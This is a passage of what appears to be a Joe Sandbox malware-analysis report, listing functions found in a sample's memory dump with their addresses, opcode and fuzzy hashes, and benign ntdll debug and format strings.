                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                                      • Instruction ID: 6ec35449439df6366f94fec8566b0ee965970dc0b6282e12473d8c69a02d0df5
                                                      • Opcode Fuzzy Hash: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                                      • Instruction Fuzzy Hash: 0E900232645800139144715859845469005A7E1301B55C021E0425554CCB148A565361
                                                      Function 01104650 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                                      • Instruction ID: 82ccc2b3fa0c1030cfe64393dba005efcba6c4be80408e0bc750da9cd9f3b995
                                                      • Opcode Fuzzy Hash: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                                      • Instruction Fuzzy Hash: 3F90026264150043414471585904406B005A7E2301395C125A0555560CC71889559369
                                                      Function 01102B80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                                      • Instruction ID: ff12f416a7574b72802b2f7718b4ce3e5a0856b1c7c290d9faea54c10fbf0769
                                                      • Opcode Fuzzy Hash: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                                      • Instruction Fuzzy Hash: 9390023224140803D10871585904686500597D1301F55C021A6025655ED76589917231
                                                      Function 01102BA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                      • Instruction ID: 550810e239b6f4b896545221ce01addd27b3723161648bd3776f7040be106d7b
                                                      • Opcode Fuzzy Hash: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                      • Instruction Fuzzy Hash: 7D90043374540C03D154715C55147475005D7D1301F55C031F0035754DC755CF5577F1
                                                      Function 01102BE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                      • Instruction ID: 97877d6c91219591bd12e7d1dd2b4eac425d77bcdf2bdc6e0c3c4c335419a7e2
                                                      • Opcode Fuzzy Hash: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                      • Instruction Fuzzy Hash: F590023224544843D14471585504A46501597D1305F55C021A0065694DD7258E55B761
                                                      Function 01102AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                      • Instruction ID: c9c530cb973e42d95beb1f9e224c5bf2cd66ff089d1ff0983ff058172db95bbe
                                                      • Opcode Fuzzy Hash: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                      • Instruction Fuzzy Hash: 799002A2241540934504B2589504B0A950597E1201B55C026E1055560CC72589519235
                                                      Function 01102AF0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                      • Instruction ID: dc4be5a693b4d38fe544e53a4140bcc043192ba89b111bd58d33c8bb7d61e163
                                                      • Opcode Fuzzy Hash: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                      • Instruction Fuzzy Hash: 33900226261400030149B558170450B5445A7D7351395C025F1417590CC72189655321
                                                      Function 01102D00 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                      • Instruction ID: 5f2916861beb95296237e69b3f49abf2fdbefe9067a16957191b3f721cebb7a5
                                                      • Opcode Fuzzy Hash: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                      • Instruction Fuzzy Hash: EA90022224544443D10475586508A06500597D1205F55D021A1065595DC7358951A231
                                                      Function 01102DB0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                      • Instruction ID: 787a4aed12bf7886bc9b8e06d57cbdc5523ab0a3adac16be8efa15ad27a44121
                                                      • Opcode Fuzzy Hash: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                      • Instruction Fuzzy Hash: D990023228140403D145715855046065009A7D1241F95C022A0425554EC7558B56AB61
                                                      Function 01102C60 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                      • Instruction ID: 29aac188d4509ca1455d9230fb1b47e64c9571f2110d82886d50a520443d1671
                                                      • Opcode Fuzzy Hash: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                      • Instruction Fuzzy Hash: 4290023224140843D10471585504B46500597E1301F55C026A0125654DC715C9517621
                                                      Function 01102CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                      • Instruction ID: 78b2b9eb1fa237f2233a76ef59166e54f4543b95492a79e5a7cdf39602d61080
                                                      • Opcode Fuzzy Hash: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                      • Instruction Fuzzy Hash: 2490022264540403D14471586518706501597D1201F55D021A0025554DC7598B5567A1
                                                      Function 01102CF0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                      • Instruction ID: 0030b9bab048ce429ce0b2db464ba6e72d8b04f5760cf4fb8c5a25ae1b3739fe
                                                      • Opcode Fuzzy Hash: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                      • Instruction Fuzzy Hash: C890023224140403D10471586608707500597D1201F55D421A0425558DD75689516221
                                                      Function 01102F60 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                                      • Instruction ID: fe62917135f8277d9370e2283f53a642b8ca8257623bdac97aaefa987288aa54
                                                      • Opcode Fuzzy Hash: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                                      • Instruction Fuzzy Hash: F590026225140043D10871585504706504597E2201F55C022A2155554CC7298D615225
                                                      Function 01102FA0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                                      • Instruction ID: 0abadae0f4569bb43f76ed64f639660d3f1e436cea46ca5ba693624b40bf1b03
                                                      • Opcode Fuzzy Hash: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                                      • Instruction Fuzzy Hash: D390023224180403D10471585908747500597D1302F55C021A5165555EC765C9916631
                                                      Function 01102E30 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                                      • Instruction ID: b558e018a7cac82cbb0d2a815f6ceca0e96e51e2a280bc2d74cf56e17785a3ff
                                                      • Opcode Fuzzy Hash: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                                      • Instruction Fuzzy Hash: F290022234140403D106715855146065009D7D2345F95C022E1425555DC7258A53A232
                                                      Function 01102EE0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                                      • Instruction ID: 135fc5a81e36f4d6afc4f03d69dfd01745a101aff359b5fb7dd1bc3f595d7a86
                                                      • Opcode Fuzzy Hash: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                                      • Instruction Fuzzy Hash: 8790026224180403D14475585904607500597D1302F55C021A2065555ECB298D516235
                                                      Function 01103010 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                                      • Instruction ID: ba2ee439b051f058ac9b72c3befa8ba3ead4d6deb9d92c922ae926c20d4b3b33
                                                      • Opcode Fuzzy Hash: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                                      • Instruction Fuzzy Hash: 3A90022224184443D14472585904B0F910597E2202F95C029A4157554CCB1589555721
                                                      Function 01103090 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                                      • Instruction ID: 9ff1019f4df565ef91e79f655176ada9e6cf997fc154deb8236911a6644cdc5b
                                                      • Opcode Fuzzy Hash: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                                      • Instruction Fuzzy Hash: 6C90022228140803D144715895147075006D7D1601F55C021A0025554DC7168A6567B1
                                                      Function 011035C0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                      • Instruction ID: 55df88d00419f574049992b3107e915872bca788882001add47234a10ace856d
                                                      • Opcode Fuzzy Hash: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                      • Instruction Fuzzy Hash: 5390023264550403D10471585614706600597D1201F65C421A0425568DC7958A5166A2
                                                      Function 011039B0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                      • Instruction ID: 74b9ef6855463ccaedf3495868ae146c0453b58f9c0941cad428be937e43eb05
                                                      • Opcode Fuzzy Hash: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                      • Instruction Fuzzy Hash: 3990022228545103D154715C55046169005B7E1201F55C031A0815594DC75589556321
                                                      Function 01103D10 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                      • Instruction ID: ebc52a100e29200ec724765ea6f91da961181937cb5dd548493885820925476b
                                                      • Opcode Fuzzy Hash: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                      • Instruction Fuzzy Hash: 1090023224240143954472586904A4E910597E2302B95D425A0016554CCB1489615321
                                                      Function 01103D70 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                      • Instruction ID: d39b0ae3ab75aec6a77046b35bcff3b0f27c41bf8becacb4bd7af50c9717c1df
                                                      • Opcode Fuzzy Hash: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                      • Instruction Fuzzy Hash: 2490023624140403D51471586904646504697D1301F55D421A0425558DC75489A1A221
                                                      Function 01102C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: 1ba76a7c44a8124a06d03aa55a5ac600dc89aa48237e38d5e859caaf06bfd800
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      Function 01102890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                      • Instruction ID: fbf3b95a6427e36ca3ca0ef8e0a7a370e94793c7d415c7b8879e2a55fc7f33eb
                                                      • Opcode Fuzzy Hash: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                      • Instruction Fuzzy Hash: C351FBB5E00116BFCB1ADB5CC89497EFBF8BF48240714816AF595D7685E374DE4087A0
                                                      Function 01172410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                      • Instruction ID: 18996b3cf45ba46cd745311dad0b2e806d010b8bb2895075990dbbf11974460c
                                                      • Opcode Fuzzy Hash: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                      • Instruction Fuzzy Hash: B151F571A04646AECB38DF5CC8909BFBBF8EB48204B148469F5D6D7741E7B4EA41C760
                                                      Function 010F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01134787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01134742
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01134655
                                                      • ExecuteOptions, xrefs: 011346A0
                                                      • Execute=1, xrefs: 01134713
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01134725
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011346FC
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                      • Instruction ID: 41b98b34a775e4e636076482a87e7652e30a7b191adbf4f7e6ec7e6845f1cf4c
                                                      • Opcode Fuzzy Hash: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                      • Instruction Fuzzy Hash: 22511931A0021A6AEF25EBA8DC86FED77A8EF58704F0400EDD745AB5D1E7709A41CF52
                                                      Function 01196940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction ID: bf8c00ad3e3b54264ebd8da32e1fed3b2875203483106f587bf79efbf348ae7f
                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                      • Instruction Fuzzy Hash: 7D021771508342AFD709CF18C890A6FBBE5EFC8714F04892DF9A95B2A4DB71E905CB52
                                                      Function 0110B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: eeabe8a47d1a83e4402f02411c66318af36769c037ee9d8236b48dcdc7247f79
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 1781D378E092498EEF2FCE6CC8517FEBBB1AF45320F18455AD861A72D1C7B48940CB59
                                                      Function 011720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 98079a6e19fe46204cdef73c44b04f949d3cbab5d361e3744d68f5b881aa5ca8
                                                      • Instruction ID: eb2e6c8c592a11db77a7f737da97e2297df9a4ef3e28c9e1ce4db5bdd2c77f58
                                                      • Opcode Fuzzy Hash: 98079a6e19fe46204cdef73c44b04f949d3cbab5d361e3744d68f5b881aa5ca8
                                                      • Instruction Fuzzy Hash: 1F21657AE00159ABDB15DF79DC40AEEBBF8FF54654F040126E945D7340E730DA028BA1
                                                      Function 010EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011302BD
                                                      • RTL: Re-Waiting, xrefs: 0113031E
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011302E7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                      • Instruction ID: 18a044f6b6f308b364f7cb3337da8736f8bb5a887f2a1e87bebc9e57c3e002c6
                                                      • Opcode Fuzzy Hash: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                      • Instruction Fuzzy Hash: 98E190706087429FE729CF29C888B2ABBE0BF88714F144A5DF5A58B2E1D774D945CB42
                                                      Function 010FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 01137B8E
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01137B7F
                                                      • RTL: Re-Waiting, xrefs: 01137BAC
